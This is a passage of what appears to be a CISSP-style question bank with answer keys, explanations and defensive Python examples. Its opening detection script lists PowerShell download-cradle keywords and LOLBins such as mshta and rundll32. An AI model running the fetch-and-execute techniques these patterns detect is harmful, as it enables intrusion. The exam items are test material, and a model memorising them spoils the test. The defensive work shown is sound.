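                "mshta.exe", "rundll32.exe", "regsvr32.exe")
DOWNLOAD_CRADLE = re.compile(
    r"(DownloadString|DownloadFile|Invoke-WebRequest|iwr\b|Net\.WebClient|IEX\b|Invoke-Expression)", re.I)


def decode_encoded_command(command_line: str) -> str:
    """PowerShell -EncodedCommand carries base64 of UTF-16LE; decode so content rules see plaintext."""
    m = re.search(r"-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]+)", command_line, re.I)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le", errors="ignore")
    except ValueError:
        return ""


def analyze(event: dict) -> list:
    """Return the behavioral indicators an event matches; an empty list means nothing suspicious."""
    image = event["image"].lower().rsplit("\\", 1)[-1]
    parent = event["parent_image"].lower().rsplit("\\", 1)[-1]
    cmd = event["command_line"]
    decoded = decode_encoded_command(cmd)
    findings = []
    if parent in OFFICE_APPS and image in SCRIPT_HOSTS:
        findings.append("office_spawns_script_host")  # macro or exploit handing off to a LOLBin
    if image in ("powershell.exe", "pwsh.exe"):
        if decoded:
            findings.append("encoded_command")
        if re.search(r"-w(?:indowstyle)?\s+hidden", cmd, re.I):
            findings.append("hidden_window")
        if re.search(r"-nop\b|-noprofile", cmd, re.I):
            findings.append("no_profile")
    if DOWNLOAD_CRADLE.search(cmd) or DOWNLOAD_CRADLE.search(decoded):
        findings.append("download_cradle")  # payload fetched straight into memory, never touching disk
    if image in ("wscript.exe", "cscript.exe", "mshta.exe") and "\\users\\public\\" in cmd.lower():
        findings.append("script_from_world_writable_dir")
    return findings


def triage(events):
    """Alert when two or more independent indicators stack up on one event."""
    return [(e["pid"], analyze(e)) for e in events if len(analyze(e)) >= 2]


if __name__ == "__main__":
    for pid, findings in triage(SAMPLE_EVENTS):
        print(pid, findings)
```

The stacking rule in triage is what keeps this usable: a lone hidden-window flag appears in plenty of admin scripts, but an Office parent plus an encoded download cradle is almost never legitimate.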

249
MCQhard

An organization uses a custom application that stores user passwords using salted SHA-256 hashes. During a security audit, the auditor recommends migrating to a more secure password storage mechanism. Which of the following is the best recommendation?

A.Use plaintext with database encryption
B.Use AES-256 encryption for passwords
C.Use bcrypt with a cost factor of 12
D.Use MD5 with a salt
E.Use PBKDF2 with 10,000 iterations
AnswerC

bcrypt is designed for password hashing with a work factor that resists brute-force.

Why this answer

bcrypt is a deliberately slow, adaptive password hashing function that includes a built-in salt and a configurable cost factor. A cost factor of 12 (2^12 rounds of its key setup) makes each hash take on the order of a few hundred milliseconds, which turns a brute-force or dictionary attack into a slow, expensive one. Unlike SHA-256, which is designed for speed and can be computed at billions of hashes per second on GPU hardware, bcrypt's 4 KB working state makes GPU cracking far less efficient. Two practitioner caveats: bcrypt silently truncates input at 72 bytes (pre-hash long passphrases or limit their length explicitly), and current guidance (OWASP) puts Argon2id first with bcrypt remaining an acceptable choice.

Exam trap

The trap here is that candidates often confuse 'encryption' (reversible) with 'hashing' (one-way) and mistakenly choose AES-256 or database encryption, failing to recognize that password storage must use a slow, salted, one-way hashing algorithm specifically designed for credential protection.

How to eliminate wrong answers

Option A is wrong because storing passwords in plaintext, even with database encryption, exposes them to any attacker who gains access to the decryption key or the running application, violating the fundamental principle of never storing passwords in recoverable form. Option B is wrong because AES-256 encryption is reversible; if the encryption key is compromised, all passwords are instantly exposed, and encryption does not protect against insider threats or application-level breaches. Option D is wrong because MD5 is cryptographically broken and vulnerable to collision attacks, and even with a salt, it is far too fast to compute, allowing attackers to crack hashes at billions per second.

Option E is wrong because, while PBKDF2 is a reasonable key derivation function, 10,000 iterations is only the floor NIST SP 800-63B sets; OWASP's Password Storage Cheat Sheet recommends 600,000 iterations for PBKDF2-HMAC-SHA256 (it recommended 310,000 earlier), so 10,000 leaves each guess roughly 30 to 60 times cheaper than current guidance, and PBKDF2 parallelizes well on GPUs and ASICs, which bcrypt and Argon2 are designed to resist.
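The migration the auditor is asking for has a practical wrinkle the question does not mention: existing salted SHA-256 hashes cannot be re-hashed with bcrypt until each user logs in, because the plaintext is not available. The Python below (an added example, not from the question bank) shows the standard answer to that: wrap every legacy digest inside the slow KDF offline so the whole table becomes expensive to attack immediately, then replace each wrapped entry with a native hash on the user's next successful login. It uses stdlib PBKDF2 at OWASP's 600,000 iterations as the slow KDF so it runs without extra packages; the same code applies unchanged with bcrypt or Argon2id from a third-party package. The storage formats, salts and passwords are constructed.

```python
import hashlib
import hmac
import os

# OWASP's 2023 figure for PBKDF2-HMAC-SHA256; bcrypt cost 12 or Argon2id would be used the same way.
ITERATIONS = 600_000


def legacy_hash(password: str, salt: bytes) -> str:
    """The scheme being migrated away from: one fast SHA-256 over salt||password."""
    return hashlib.sha256(salt + password.encode()).hexdigest()


def slow_kdf(secret: bytes, salt: bytes, iterations: int = ITERATIONS) -> bytes:
    """Stand-in for bcrypt/Argon2: stdlib PBKDF2 so the example runs without extra packages."""
    return hashlib.pbkdf2_hmac("sha256", secret, salt, iterations, dklen=32)


def wrap_legacy(stored_legacy: str) -> str:
    """Offline upgrade with no plaintext available: run the OLD digest through the slow KDF.
    Every stored hash becomes slow to attack immediately, before any user logs in."""
    _, legacy_salt_hex, legacy_digest = stored_legacy.split("$")
    new_salt = os.urandom(16)
    dk = slow_kdf(legacy_digest.encode(), new_salt)
    return "$".join(["wrapped", str(ITERATIONS), legacy_salt_hex, new_salt.hex(), dk.hex()])


def hash_password(password: str) -> str:
    """Native format for new passwords and for rehash-on-login."""
    salt = os.urandom(16)
    return "$".join(["pbkdf2", str(ITERATIONS), salt.hex(), slow_kdf(password.encode(), salt).hex()])


def verify(password: str, stored: str):
    """Return (ok, needs_rehash); all three formats are accepted during the migration window."""
    parts = stored.split("$")
    scheme = parts[0]
    if scheme == "legacy":
        _, salt_hex, digest = parts
        ok = hmac.compare_digest(legacy_hash(password, bytes.fromhex(salt_hex)), digest)
        return ok, True
    if scheme == "wrapped":
        _, iters, legacy_salt_hex, salt_hex, dk_hex = parts
        inner = legacy_hash(password, bytes.fromhex(legacy_salt_hex)).encode()
        ok = hmac.compare_digest(slow_kdf(inner, bytes.fromhex(salt_hex), int(iters)).hex(), dk_hex)
        return ok, True
    if scheme == "pbkdf2":
        _, iters, salt_hex, dk_hex = parts
        ok = hmac.compare_digest(slow_kdf(password.encode(), bytes.fromhex(salt_hex), int(iters)).hex(), dk_hex)
        return ok, int(iters) < ITERATIONS  # rehash when the work factor has since been raised
    raise ValueError("unknown hash scheme")


def login(password: str, stored: str):
    """Authenticate; on success with a legacy, wrapped or weaker hash, return the upgraded record to store."""
    ok, needs_rehash = verify(password, stored)
    if ok and needs_rehash:
        return True, hash_password(password)
    return ok, stored
```

The needs_rehash flag is also how the work factor gets raised over time: bump ITERATIONS (or the bcrypt cost) and every successful login quietly upgrades its own record.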

250
Multi-Selecteasy

Which TWO are essential components of a security policy framework?

Select 2 answers
A.Specific encryption key lengths
B.Incident response flowcharts
C.Network topology diagrams
D.Roles and responsibilities
E.Statement of scope
AnswersD, E

Policies must assign responsibility for security.

Why this answer

A security policy framework includes high-level policies that define scope, responsibilities, and governance. Standards and procedures operationalize policies, but the core policy document includes scope and roles.

251
MCQhard

A government agency's data retention policy requires that classified documents be destroyed after 10 years. Which method ensures both the information and the media are completely destroyed in a way that is verifiable and auditable?

A.Incineration in a certified facility
B.Overwriting the data seven times
C.Degaussing the storage media
D.Deleting all files and emptying the recycle bin
AnswerA

Incineration destroys both data and media, and provides audit trail via destruction certificates.

Why this answer

Incineration in a certified facility is the only option that completely destroys both the information and the physical media, leaving no residue that could be reconstructed. For classified government documents, the destruction must be verifiable and auditable, which a certified incineration facility provides through documented chain-of-custody and destruction certificates. This method ensures the media is physically reduced to ash, eliminating any possibility of data recovery, unlike logical or magnetic techniques.

Exam trap

The trap here is that candidates often confuse 'sanitization' with 'destruction' — they may choose degaussing or overwriting because those methods effectively erase data, but the question explicitly requires complete destruction of both information and media, which only physical destruction methods like incineration achieve.

How to eliminate wrong answers

Option B is wrong because a seven-pass overwrite (the DoD 5220.22-M-derived pattern; Gutmann is 35 passes) only addresses logical data on functional media; it does not destroy the media itself, cannot reach sectors the drive has remapped, and for classified material the media must be physically destroyed. In NIST SP 800-88 terms this is a Clear or Purge, not Destroy. Option C is wrong because degaussing removes the magnetic domains on magnetic media, rendering data unreadable, but leaves the device physically intact, and it has no effect on flash-based media such as SSDs, so it is neither complete nor verifiable across media types. Option D is wrong because deleting files and emptying the recycle bin only removes file system pointers, leaving the data intact on the media until overwritten; it is entirely insufficient for classified material and produces no verifiable or auditable proof of destruction.

252
MCQhard

A multinational corporation is establishing a security governance framework. The board of directors wants to ensure that information security strategy aligns with business objectives. Which role is primarily responsible for integrating security into the organization's strategic decision-making?

A.IT security team
B.Internal audit team
C.Senior management
D.Data owner
AnswerC

Senior management sets strategic direction and ensures security aligns with business objectives.

Why this answer

Senior management (C) is primarily responsible for integrating security into strategic decision-making because they hold the authority to allocate resources, define risk appetite, and ensure that security initiatives directly support business objectives. In a governance framework, only senior management can bridge the gap between operational security and enterprise strategy, as they are accountable for the organization's overall risk posture and compliance mandates.

Exam trap

The trap here is that candidates often confuse operational responsibility (IT security team) with strategic accountability (senior management), leading them to select the IT security team because they are the ones executing security tasks, but the CISSP emphasizes that governance and strategic alignment are board-level duties.

How to eliminate wrong answers

Option A is wrong because the IT security team is responsible for implementing and operationalizing security controls, not for setting strategic direction or aligning security with business goals. Option B is wrong because the internal audit team provides independent assurance and evaluates control effectiveness, but they do not own or drive strategic integration of security. Option D is wrong because the data owner is accountable for classifying and protecting specific data assets, not for enterprise-wide strategic alignment of security with business objectives.

253
MCQmedium

A company is implementing a secure software development lifecycle (SSDLC). Which of the following is a key activity during the design phase?

A.Static code analysis
B.Code signing
C.Threat modeling
D.Penetration testing
AnswerC

Correct. Threat modeling identifies threats and vulnerabilities early in the design phase.

Why this answer

Threat modeling is a key activity during the design phase of the SSDLC because it proactively identifies potential security threats, vulnerabilities, and attack vectors before any code is written. By analyzing the system's architecture, data flows, and trust boundaries (e.g., using STRIDE or PASTA methodologies), teams can design security controls directly into the system, reducing the cost and impact of fixes later. This aligns with the Microsoft SDL and with NIST's Secure Software Development Framework (SP 800-218, which superseded the now-withdrawn SP 800-64), both of which place threat modeling in the design stage.

Exam trap

The trap here is that candidates confuse 'design phase' with 'implementation phase' activities, mistakenly selecting static code analysis (A) because it is a common security review, but it requires code to exist, whereas threat modeling is the only design-phase option that addresses architecture before code is written.

How to eliminate wrong answers

Option A is wrong because static code analysis is a source code review technique performed during the implementation phase, not the design phase, as it requires code to be written to scan for syntax errors and security flaws. Option B is wrong because code signing is a deployment-phase activity that uses digital signatures (e.g., Authenticode) to verify the integrity and origin of compiled binaries, not a design-phase task. Option D is wrong because penetration testing is a validation activity performed during the testing or operations phase, where live systems are attacked to find vulnerabilities, not during design.
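As an added example of what design-phase threat modeling produces before any code exists (this is not from the question bank or any named tool), the Python below implements STRIDE-per-element, the variant used in the Microsoft SDL and in Shostack's Threat Modeling: each data-flow diagram element type is susceptible to a fixed subset of the six categories (external entities to S and R; processes to all six; stores and flows to T, I and D, with R added for audit stores), and flows that cross a trust boundary or carry secrets are prioritized. The sample DFD of a banking app is constructed.

```python
from dataclasses import dataclass

# STRIDE-per-element applicability (Microsoft SDL / Shostack): which categories apply to which
# DFD element kind. Repudiation on a data store applies only when it holds audit records.
APPLICABLE = {
    "external_entity": "SR",
    "process": "STRIDE",
    "data_store": "TID",
    "data_flow": "TID",
}
STRIDE_NAMES = {"S": "Spoofing", "T": "Tampering", "R": "Repudiation",
                "I": "Information disclosure", "D": "Denial of service",
                "E": "Elevation of privilege"}


@dataclass
class Element:
    name: str
    kind: str            # one of APPLICABLE's keys
    trust_zone: str      # e.g. "internet", "dmz", "internal"
    is_log_store: bool = False


@dataclass
class Flow:
    name: str
    src: Element
    dst: Element
    carries: str = ""    # e.g. "credentials", "card_data"

    def crosses_trust_boundary(self) -> bool:
        return self.src.trust_zone != self.dst.trust_zone


def threats_for_element(el: Element):
    cats = APPLICABLE[el.kind]
    if el.kind == "data_store" and el.is_log_store:
        cats += "R"
    return [(el.name, STRIDE_NAMES[c]) for c in cats]


def threats_for_flow(fl: Flow):
    out = []
    for c in APPLICABLE["data_flow"]:
        priority = "high" if fl.crosses_trust_boundary() else "low"
        if c == "I" and fl.carries in ("credentials", "card_data"):
            priority = "high"
        out.append((fl.name, STRIDE_NAMES[c], priority))
    return out


def enumerate_threats(elements, flows):
    """Design-phase output: a starting threat list per element, before any code exists.
    Each entry still needs a human decision: mitigate, accept, transfer or avoid."""
    return {
        "elements": [t for el in elements for t in threats_for_element(el)],
        "flows": [t for fl in flows for t in threats_for_flow(fl)],
    }


# Constructed sample model: a customer browser talking to a web app that reads a database.
browser = Element("Customer browser", "external_entity", "internet")
webapp = Element("Online banking app", "process", "dmz")
db = Element("Accounts DB", "data_store", "internal")
audit = Element("Audit log", "data_store", "internal", is_log_store=True)
FLOWS = [
    Flow("Login request", browser, webapp, carries="credentials"),
    Flow("Account query", webapp, db),
    Flow("Audit write", webapp, audit),
]
MODEL = enumerate_threats([browser, webapp, db, audit], FLOWS)

if __name__ == "__main__":
    for entry in MODEL["elements"] + MODEL["flows"]:
        print(entry)
```

The output is the raw material for the design review: "Login request / Information disclosure / high" becomes a requirement for TLS with a pinned minimum version, "Audit log / Repudiation" becomes a requirement for append-only, signed log storage, and so on, all decided before the implementation phase tools in options A, B and D have anything to examine.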

254
MCQmedium

Which of the following describes the concept of 'least privilege' in the context of access control?

A.Users are granted only the permissions necessary to perform their job functions
B.Access is granted on a need-to-know basis but with maximum permissions
C.Access is based on roles and seniority
D.Users have access to all resources unless explicitly denied
AnswerA

Correct. Least privilege limits access to the minimum required.

Why this answer

Least privilege is a fundamental access control principle that mandates users be granted only the permissions necessary to perform their specific job functions. This minimizes the attack surface by reducing unnecessary access to sensitive resources, limiting potential damage from accidental or malicious actions. In practice it is enforced through role- or attribute-based access control with narrowly scoped roles, just-in-time elevation for administrative tasks, and periodic access reviews that remove rights no longer needed, so that no user holds more rights than required.

Exam trap

The trap here is that candidates often confuse 'least privilege' with 'need-to-know' (which focuses on data confidentiality rather than permission granularity) or assume that role-based access inherently enforces least privilege, ignoring that roles can be overly broad.

How to eliminate wrong answers

Option B is wrong because it contradicts least privilege by granting 'maximum permissions' on a need-to-know basis, which would over-provision access and increase risk. Option C is wrong because it conflates least privilege with role-based access control (RBAC) and seniority, which may assign excessive permissions based on role hierarchy rather than actual job necessity. Option D is wrong because it describes a default-allow or 'open' access model, which is the opposite of least privilege; least privilege requires explicit permission grants, not implicit access to all resources.

255
MCQhard

A financial institution mandates that all administrative access to network devices must go through a privileged access management (PAM) solution. The PAM solution manages and rotates credentials automatically and logs all sessions. Recently, an auditor discovered that a router's configuration was changed outside of the approved change window. PAM logs show no session during that time. The router supports both local and RADIUS authentication. Which of the following is the MOST likely explanation for the unauthorized change?

A.A local account on the router was used that is not managed by the PAM solution.
B.The PAM solution's database was corrupted and failed to log the session.
C.The router's RADIUS configuration pointed to a different, unmonitored authentication server.
D.The network administrator used a shared service account not unique to the PAM system.
AnswerA

Local accounts bypass PAM entirely, allowing unauthorized changes without being logged.

Why this answer

Option A is correct. A local account on the router that PAM does not manage allows a direct login that never passes through the PAM solution, so neither credential rotation nor session recording applies to it; the change is invisible to PAM by design, which matches the evidence exactly (a real change, no session record). Option B is less likely because database corruption would show up as widespread logging gaps or failures, not a single clean miss.

Option D is plausible but collapses into the same finding: if the shared service account were vaulted by PAM, the session would have been brokered and logged; if it is not, it is an unmanaged account like the local one. Option C is possible but less likely because it would require someone to alter the router's RADIUS server configuration without that change itself being noticed, and the question gives no evidence of it. The practical check is to correlate the router's own syslog (login and config-change events, with source IP and account) against PAM session records, then remove or vault every account that can authenticate outside PAM.
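That correlation is shown below as an added example (not from the question bank or any PAM product): it parses router config-change events in the common Cisco-style syslog shape, checks each against PAM session windows, and explains each unbrokered change by whether the account is one PAM vaults and whether the source is the PAM jump host. The syslog lines, PAM records, host names and IP addresses are constructed.

```python
from datetime import datetime, timedelta

# Constructed router syslog (Cisco-style CONFIG_I and login events) and PAM session records.
ROUTER_SYSLOG = [
    "2024-03-02T01:12:04Z core-rtr1 SEC_LOGIN: Login Success [user: admin] [Source: 10.0.5.23] [localport: 22]",
    "2024-03-02T01:13:40Z core-rtr1 PARSER: User admin (10.0.5.23) logged command: configure terminal",
    "2024-03-02T01:14:02Z core-rtr1 SYS-5-CONFIG_I: Configured from console by admin on vty0 (10.0.5.23)",
    "2024-03-02T09:30:11Z core-rtr1 SEC_LOGIN: Login Success [user: pam-jdoe] [Source: 10.0.9.10] [localport: 22]",
    "2024-03-02T09:41:55Z core-rtr1 SYS-5-CONFIG_I: Configured from console by pam-jdoe on vty1 (10.0.9.10)",
]
PAM_SESSIONS = [
    {"user": "jdoe", "target": "core-rtr1", "start": "2024-03-02T09:28:00Z", "end": "2024-03-02T09:50:00Z"},
]
PAM_MANAGED_ACCOUNTS = {"core-rtr1": {"pam-jdoe", "pam-svc"}}  # accounts PAM vaults per device
PAM_JUMP_HOSTS = {"10.0.9.10"}                                  # the only source PAM sessions use


def parse_ts(s: str) -> datetime:
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%SZ")


def parse_config_changes(lines):
    """Yield (time, device, account, source_ip) for each config-change event."""
    for line in lines:
        if "CONFIG_I" not in line:
            continue
        ts, device, rest = line.split(" ", 2)
        account = rest.split(" by ")[1].split(" ")[0]
        src = rest.rsplit("(", 1)[1].rstrip(")")
        yield parse_ts(ts), device, account, src


def in_pam_session(ts, device, sessions, slack=timedelta(minutes=2)):
    """True when a PAM session to this device covers the timestamp (with clock-skew slack)."""
    return any(
        s["target"] == device and parse_ts(s["start"]) - slack <= ts <= parse_ts(s["end"]) + slack
        for s in sessions
    )


def find_unbrokered_changes(syslog, sessions):
    """Config changes with no covering PAM session; the account and source explain the bypass path."""
    findings = []
    for ts, device, account, src in parse_config_changes(syslog):
        if in_pam_session(ts, device, sessions):
            continue
        reasons = []
        if account not in PAM_MANAGED_ACCOUNTS.get(device, set()):
            reasons.append("account_not_managed_by_pam")  # e.g. a local or enable account
        if src not in PAM_JUMP_HOSTS:
            reasons.append("source_not_pam_jump_host")
        findings.append({"time": ts.isoformat(), "device": device, "account": account,
                         "source": src, "reasons": reasons or ["no_session_record"]})
    return findings


if __name__ == "__main__":
    for f in find_unbrokered_changes(ROUTER_SYSLOG, PAM_SESSIONS):
        print(f)
```

A finding tagged account_not_managed_by_pam is the question's option A; one tagged only source_not_pam_jump_host would point at the RADIUS path in option C; one with no_session_record alone would be the first hint of the logging failure in option B.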

256
MCQeasy

According to NIST SP 800-61, which phase of incident response immediately follows detection and analysis?

A.Recovery
B.Preparation
C.Eradication
D.Containment
AnswerD

Containment immediately follows detection.

Why this answer

According to NIST SP 800-61, the incident response lifecycle consists of four phases: Preparation, Detection & Analysis, Containment/Eradication/Recovery, and Post-Incident Activity. The phase that immediately follows Detection & Analysis is Containment, because once an incident is detected and analyzed, the priority is to limit damage and prevent further spread before eradication and recovery can be safely performed.

Exam trap

The trap here is that candidates confuse the logical order of the NIST phases, often selecting Eradication because they think removing the threat is the immediate next step, but NIST explicitly places Containment before Eradication to ensure the incident is stabilized first.

How to eliminate wrong answers

Option A is wrong because Recovery occurs after Eradication, not immediately after Detection & Analysis; it involves restoring systems to normal operation. Option B is wrong because Preparation is the initial phase that occurs before any incident, not after detection. Option C is wrong because Eradication follows Containment in the NIST framework; you must first contain the threat to prevent further damage before removing malware or compromised accounts.

257
MCQhard

A network architect is designing a network to comply with PCI DSS requirements that cardholder data must be encrypted during transmission over open networks. Which protocol should be used for encrypting traffic between a point-of-sale (POS) terminal and the payment gateway?

A.TLS 1.0
B.TLS 1.2
C.SSH
D.SSL 3.0
AnswerB

TLS 1.2 is secure and widely accepted for payment transactions.

Why this answer

TLS 1.2 is the correct choice because it is a widely accepted, secure protocol for encrypting data in transit and meets the PCI DSS definition of strong cryptography. PCI DSS prohibits SSL and early TLS (1.0) as security controls because of known weaknesses. TLS 1.2 offers modern AEAD cipher suites and, when ECDHE suites are used, forward secrecy; TLS 1.3 is preferred where both the terminal and the gateway support it.

Exam trap

The trap here is that candidates may confuse TLS 1.0 with TLS 1.2, assuming all TLS versions are equally secure, but PCI DSS explicitly requires TLS 1.2 or higher, and TLS 1.0 is considered weak and non-compliant.

How to eliminate wrong answers

Option A is wrong because PCI DSS 3.1 (2015) barred SSL and early TLS (1.0) from new implementations and set June 30, 2018 as the migration deadline for existing ones; TLS 1.0 is exposed to BEAST and lacks modern cipher suites, so it does not meet the requirement for strong cryptography. Option C is wrong because SSH is a remote-administration and file-transfer protocol, not the protocol payment gateways expose; POS-to-gateway traffic is HTTPS, i.e. TLS. Option D is wrong because SSL 3.0 is broken (POODLE) and has been prohibited by PCI DSS under the same rule, with no secure cipher suites to fall back on.

258
MCQmedium

Refer to the exhibit. An organization attaches this IAM policy to a user. What is a key security limitation of this policy?

A.It only allows the GetObject action, limiting functionality
B.It does not specify a Principal, so access is denied for all
C.It allows all actions except s3:GetObject
D.It allows access from any IP within the 10.0.0.0/8 range, which is too broad
AnswerA

The policy grants only read access, which may be too restrictive for some use cases.

Why this answer

Option A is correct because the policy only grants the s3:GetObject action, which restricts the user to read-only access on S3 objects. This is a key security limitation as it prevents the user from performing other necessary operations like listing buckets (s3:ListBucket) or writing data, which can hinder operational workflows. The policy's narrow scope ensures least privilege but may be too restrictive for roles requiring broader S3 interactions.

Exam trap

ISC2 often tests the misconception that an IAM policy without a Principal is invalid or denies all access, but in identity-based policies, the Principal is implicit and not required.

How to eliminate wrong answers

Option B is wrong because IAM policies attached to a user do not require a Principal element; the Principal is implicitly the user to whom the policy is attached, so access is not denied for all. Option C is wrong because the policy explicitly allows s3:GetObject, not all actions except s3:GetObject; a Deny effect would be needed to block a specific action while allowing others. Option D is wrong because the policy does not include a condition key like aws:SourceIp to restrict access to the 10.0.0.0/8 range; without such a condition, the policy applies globally regardless of IP address.

259
Drag & Dropmedium

Drag and drop the steps for a secure password change procedure in the correct order.

Drag steps to the numbered slots on the right, or tap a step then tap a slot.

Steps
Order

Why this order

Password change, in order: 1) verify the requester's identity (current password and, where enrolled, a second factor); 2) accept and confirm the new password; 3) check it against policy and password history (and a breached-password list); 4) hash it with a salted, slow algorithm and store the hash; 5) log the change and invalidate other active sessions. Identity must be verified before anything else or an attacker holding a session can lock the real user out, and history is checked before storage so a rejected password never reaches the database.

260
MCQhard

A security analyst discovers that a service account in Active Directory has not had its password changed in 5 years and has domain admin privileges. The account is used by a legacy application that does not support modern authentication protocols. Which of the following is the MOST secure approach to manage this account?

A.Convert the account to a group Managed Service Account (gMSA)
B.Set a very long, complex password and store it in a password manager
C.Decommission the legacy application and migrate to a modern alternative that supports secure authentication
D.Disable the account and create a new service account with limited privileges
AnswerC

Eliminates the risk entirely by removing the service account.

Why this answer

Option C is correct because retiring the legacy application removes the account, its five-year-old credential and its domain admin rights together instead of managing around them. Option A is wrong because gMSAs (Windows Server 2012 and later) require the application to support them, which the scenario rules out. Option B is wrong because a long password stored in a manager is still a static secret with domain admin rights: it can be read from the application's configuration or memory, and nothing rotates it.

Option D is wrong as stated because disabling the account breaks the application. Until the migration completes, interim steps that do not break it are removing the account from Domain Admins and granting only the rights the application actually needs, rotating the password, and restricting the account to logging on from the application host.

261
MCQeasy

A system administrator is configuring an LDAP directory for user authentication. The policy requires that account lockout occurs after a specified number of failed attempts. Which attribute should be configured?

A.failedLoginAttempts
B.lockoutThreshold
C.lockoutDuration
D.passwordLockoutTime
AnswerB

This attribute defines the number of failed attempts before account lockout.

Why this answer

The `lockoutThreshold` attribute specifies the maximum number of consecutive failed authentication attempts allowed before the account is locked. This directly satisfies the policy requirement, making it the correct attribute to configure. Note that `lockoutThreshold` is the Active Directory name (set on the domain object); directories that implement the LDAP password policy draft (OpenLDAP, 389 Directory Server) express the same control as `pwdMaxFailure`, with `pwdLockoutDuration` for the lock duration and `pwdFailureTime` as the per-entry record of failed attempts.

Exam trap

The trap here is that candidates confuse the attribute that sets the failure limit (`lockoutThreshold`) with the attribute that tracks current failures (`failedLoginAttempts`) or the attribute that sets the lockout duration (`lockoutDuration`), leading them to pick a wrong option that describes a related but distinct function.

How to eliminate wrong answers

Option A is wrong because `failedLoginAttempts` is typically an operational attribute that tracks the current count of failed attempts, not a configuration parameter that sets the threshold for lockout. Option C is wrong because `lockoutDuration` defines how long the account remains locked after the threshold is exceeded, not the number of failed attempts that trigger the lockout. Option D is wrong because `passwordLockoutTime` is not a standard LDAP attribute; it may be confused with a timestamp of when the lockout occurred, but it does not set the failure count limit.

262
MCQhard

Refer to the exhibit. A security auditor examines the Git history of a critical security patch. What is the most significant security concern?

A.The security fix was reverted, re-exposing the application to the authentication bypass vulnerability.
B.Developer A and Developer B are not following a formal commit process.
C.The commit message of the revert does not explain why the vulnerability fix was removed.
D.The fix was authored by Developer B but reverted by Developer A without approval.
AnswerA

Reversing the fix reintroduces the vulnerability.

Why this answer

Option A is correct because a developer reverted a security fix, re-introducing the authentication bypass into the code base. That is a live exposure, and it is the finding an auditor leads with. Option B is wrong because, while an informal commit process is a real weakness, it is the cause to address afterwards, not the most significant concern.

Option C is wrong because the commit message states that it reverts the fix, so the intent is clear even though the justification is missing. Option D is wrong because the exhibit shows who made the revert, not whether approval was sought; that is a process question, and the exposure is the primary concern regardless of who performed the revert.
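The audit check implied by this item can be automated. The Python below is an added example (not the exhibit's real history and not from the question bank): it parses `git log` output in a custom `--format` that separates fields with ASCII unit separators and commits with record separators, finds every revert commit, and flags the ones whose target reads like a security fix, noting whether a different author performed the revert and whether any justification beyond the boilerplate "This reverts commit" line was given. The commit hashes, authors and messages are constructed.

```python
import re

# Constructed output of: git log --format='%H%x1f%an%x1f%aI%x1f%s%x1f%b%x1e'
SAMPLE_GIT_LOG = (
    "9c1e2a7\x1fDeveloper A\x1f2024-04-03T15:02:10+00:00"
    "\x1fRevert \"Fix auth bypass in session validation\""
    "\x1fThis reverts commit 4f3b2d1.\x1e"
    "4f3b2d1\x1fDeveloper B\x1f2024-04-02T11:20:44+00:00"
    "\x1fFix auth bypass in session validation"
    "\x1fReject sessions whose signature does not verify.\x1e"
    "1a2b3c4\x1fDeveloper A\x1f2024-04-01T09:00:00+00:00"
    "\x1fRevert \"Bump logging verbosity\""
    "\x1fThis reverts commit deadbee.\x1e"
    "deadbee\x1fDeveloper C\x1f2024-03-30T09:00:00+00:00"
    "\x1fBump logging verbosity\x1f\x1e"
)

SECURITY_WORDS = re.compile(
    r"\b(CVE-\S+|auth(?:entication|orization)?\s+bypass|security|vuln(?:erability)?"
    r"|XSS|injection|CSRF|privilege)\b", re.I)
REVERTS = re.compile(r"This reverts commit ([0-9a-f]{7,40})")


def parse_log(raw: str):
    """Map sha -> commit fields from the separator-delimited log format above."""
    commits = {}
    for rec in raw.split("\x1e"):
        if not rec.strip():
            continue
        sha, author, date, subject, body = rec.split("\x1f")
        commits[sha] = {"sha": sha, "author": author, "date": date, "subject": subject, "body": body}
    return commits


def reverted_security_fixes(commits):
    """Flag reverts whose target commit reads like a security fix: the fix is gone from HEAD
    while the ticket still says 'patched'. Author mismatch and missing justification are
    recorded as secondary, process-level observations."""
    findings = []
    for c in commits.values():
        m = REVERTS.search(c["body"])
        if not m:
            continue
        target = commits.get(m.group(1))
        if target is None:  # reverted commit lies outside the range that was pulled
            continue
        if not SECURITY_WORDS.search(target["subject"] + " " + target["body"]):
            continue
        justification = REVERTS.sub("", c["body"]).strip(" .\r\n\t")
        findings.append({
            "revert": c["sha"],
            "reverted_fix": target["sha"],
            "fix_subject": target["subject"],
            "reverted_by_different_author": c["author"] != target["author"],
            "revert_has_justification": bool(justification),
        })
    return findings


if __name__ == "__main__":
    for f in reverted_security_fixes(parse_log(SAMPLE_GIT_LOG)):
        print(f)
```

Run against a real repository with the same `--format` string, this belongs in CI or in a scheduled audit job; matching on the subject of the reverted commit is deliberate, since the revert's own subject is usually just the original subject quoted.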

263
MCQhard

A company uses BGP to exchange routes with its ISP. To prevent prefix hijacking, which mechanism should be implemented?

A.BGP MD5 authentication
B.BGP community values
C.RPKI
D.AS-path filtering
AnswerC

Validates the origin AS of prefixes, mitigating hijacking.

Why this answer

RPKI (Resource Public Key Infrastructure) is the correct mechanism because it lets routers cryptographically check the origin AS of a BGP announcement: the prefix holder publishes a Route Origin Authorization (ROA) naming the AS allowed to originate the prefix and the longest prefix length allowed, and Route Origin Validation (RFC 6811) classifies each received route as valid, invalid or not-found against the ROA set. Routers that drop invalid routes refuse a hijacker's announcement for a covered prefix. Unlike the other options, RPKI anchors trust in the IP address allocation hierarchy (the RIRs), so it addresses the root cause of hijacking, an unauthorized origin AS claim, rather than the transport or the policy tags around it. Two caveats: ROV checks only the origin, not the AS path (path validation is the job of BGPsec or ASPA), and it protects only where networks both deploy validation and drop invalids.

Exam trap

ISC2 often tests BGP MD5 authentication as a security measure, but the trap here is confusing session-level authentication (MD5) with route-level validation (RPKI), leading candidates to choose A because they think 'authentication' covers route integrity, when it only protects the BGP session itself.

How to eliminate wrong answers

Option A is wrong because BGP MD5 authentication (RFC 2385, today usually replaced by TCP-AO) only secures the TCP session between BGP peers, preventing spoofed TCP resets or session hijacking; it does not validate the route content itself, so it cannot stop a peer from announcing a prefix it does not own. Option B is wrong because BGP community values are tags used for route policy and traffic engineering (local preference, prepending, blackholing), but they are not authenticated or bound to the origin AS, so an attacker can set or strip them at will. Option D is wrong because AS-path filtering relies on manually maintained prefix lists or AS-path access lists, which are static, error-prone, and unable to detect a hijack whose path looks legitimate (a compromised AS, or an attacker who prepends the victim's AS number to its own announcement).
